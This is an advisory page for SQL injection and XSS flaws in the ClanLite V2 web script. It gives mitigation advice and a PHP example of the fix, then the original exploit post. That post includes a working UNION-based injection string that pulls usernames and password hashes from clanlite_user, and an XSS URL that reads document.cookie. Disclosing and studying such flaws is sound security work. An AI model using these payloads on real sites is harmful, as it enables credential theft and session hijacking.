Vendor: ClanLite V2
By: ZoRLu
CVSS: 5.5 (MEDIUM)
SQL Injection, XSS
CWE
Product Name: ClanLite V2
Affected Version From: ClanLite V2
Affected Version To: ClanLite V2.2006.05.20
Patch Exists: NO
Platforms Tested:
2006

ClanLite V2 SQL Injection & XSS

The ClanLite V2 script is vulnerable to SQL injection and XSS attacks. The SQL injection vulnerability can be exploited by an attacker to extract sensitive information from the database. The XSS vulnerability allows an attacker to inject and execute malicious scripts on the affected website.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user input before using it in SQL queries and to implement proper input validation and output encoding to prevent XSS attacks. It is also advisable to keep the ClanLite V2 script up to date with the latest security patches.
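
One way to apply this mitigation to the `link`, `mois` and `annee` parameters named in the advisory on this page, as an added example that is not ClanLite's own code. It uses PDO bound parameters in place of manual sanitization, plus integer validation and output encoding; the in-memory SQLite database, the lookup column, the helper names and the accepted ranges are assumptions.

```php
<?php
// Added example, not ClanLite source. Only clanlite_user, user, psw and mail come
// from the advisory; the lookup column, helper names and ranges are assumptions.

// Constructed in-memory SQLite database standing in for the application's backend.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE clanlite_user (id INTEGER PRIMARY KEY, user TEXT, psw TEXT, mail TEXT)');
$pdo->exec("INSERT INTO clanlite_user (user, psw, mail)
            VALUES ('admin', 'constructed-hash', 'admin@example.test')");

// profil.php: bind `link` as data, so quotes and comment markers in it are never
// parsed as SQL. Select only the columns needed for display, never psw.
function find_profile(PDO $pdo, string $link): ?array
{
    $stmt = $pdo->prepare('SELECT user, mail FROM clanlite_user WHERE user = :link');
    $stmt->execute([':link' => $link]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// calendrier.php: `mois` and `annee` are numbers, so accept only an integer in
// range and fall back to a default for anything else (markup, arrays, empty).
function calendar_param($raw, int $min, int $max, int $default): int
{
    $value = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $value === false ? $default : $value;
}

// Encode at the point of output so a value can never close the attribute or tag.
function h(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request values: one quote-breaking string, one markup string.
$profile = find_profile($pdo, "nobody' OR '1'='1");
echo $profile === null ? "profile: not found\n" : 'profile: ' . h($profile['user']) . "\n";

$mois  = calendar_param('6', 1, 12, (int) date('n'));
$annee = calendar_param('"><script>alert(1)</script>', 1970, 2100, (int) date('Y'));
echo '<a href="calendrier.php?mois=' . $mois . '&amp;annee=' . $annee . '">',
     h("$mois/$annee"), "</a>\n";
```

The same pattern applies to every other request parameter that reaches a query or is echoed into a page, not only the three shown here.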

Exploit-DB raw data:

########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

ClanLite V2 SQL inj. & XSS

dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005

dork: Themed By Ray © 2003, 2004 iOptional 

readme script

/****************************************************************************
 *	Fichier		: 															*
 *	Copyright	: (C) 2004 ClanLite V2											*
 *	Email		: support@clanlite.org										*
 *																			*
 *   This program is free software; you can redistribute it and/or modify	*
 *   it under the terms of the GNU General Public License as published by	*
 *   the Free Software Foundation; either version 2 of the License, or		*
 *   (at your option) any later version.									*
 ***************************************************************************/
   
 author: ZoRLu 

   home: ( yildirimordulari.org ) ( z0rlu.ownspace.org ) ( milw0rm.org ) ( r00tsecurity.org ) ( securityfocus.com ) 

contact: trt-turk@hotmail.com & ZoRLu@w.cn ( no other MSN account; beware of imitations )

    Note: anyone who adds my MSN and then talks rudely, their whole family .... I'm not giving out my MSN so that you can ask me for a keylogger. Don't talk nonsense either  :((

    Note: http://www.z0rlu.ownspace.org   information on how the vulnerabilities are used is available on my blog! what can you do, there's no money, so we opened a free one :))

########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

http://localhost/clanlite_path/service/profil.php?link=[SQL]


[SQL]=

ZoRLu'/**/union/**/select/**/null,null,mail,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,0x3a,psw),null,null,null/**/from/**/clanlite_user/*


[XSS]=

http://localhost/clanlite/service/calendrier.php?mois=6&annee="><script>alert(document.cookie)</script>


########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

thanx: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, bLaCk, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK,

kasIrga(lavrens), w3R3m, avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org

He's a commando now: iSoMiX ( you're dear to me, brother, my best friend :))  )

Legend: YILDIRIMORDULARI.ORG

Classes have started, online life is over  :(((

########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

# milw0rm.com [2008-05-12]